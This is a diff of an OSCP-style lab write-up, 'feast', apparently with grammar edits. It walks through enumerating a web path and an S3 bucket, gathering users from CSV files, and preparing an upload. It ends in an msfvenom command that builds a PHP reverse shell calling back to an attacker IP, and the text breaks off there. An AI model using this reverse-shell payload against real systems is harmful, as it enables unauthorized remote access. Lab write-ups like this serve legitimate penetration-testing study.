krovs/oscp-writeups/docs/PWK Challenges/feast.md

 ![](assets/Pasted%20image%2020250228111044.png)

-With feroxbuster we discover /storage
+With feroxbuster, we discover /storage.

 ![](assets/Pasted%20image%2020250228120317.png)

 ![](assets/Pasted%20image%2020250228120343.png)

-We can see those csv with curl
+We can see those CSV files with curl.

 ![](assets/Pasted%20image%2020250228121300.png)

-And get 4 users
+And get four users.

-This is a s3 bucket, let's enumera it.
+This is an S3 bucket.
+Let's enumerate it.

 ![](assets/Pasted%20image%2020250228153615.png)

 ![](assets/Pasted%20image%2020250228153544.png)

-We can upload objects so we ca try to upload a reverse shell.
+We can upload objects, so we can try to upload a reverse shell.

 ```bash
 msfvenom -p php/reverse_php LHOST=192.168.45.191 LPORT=6666 -o shell.php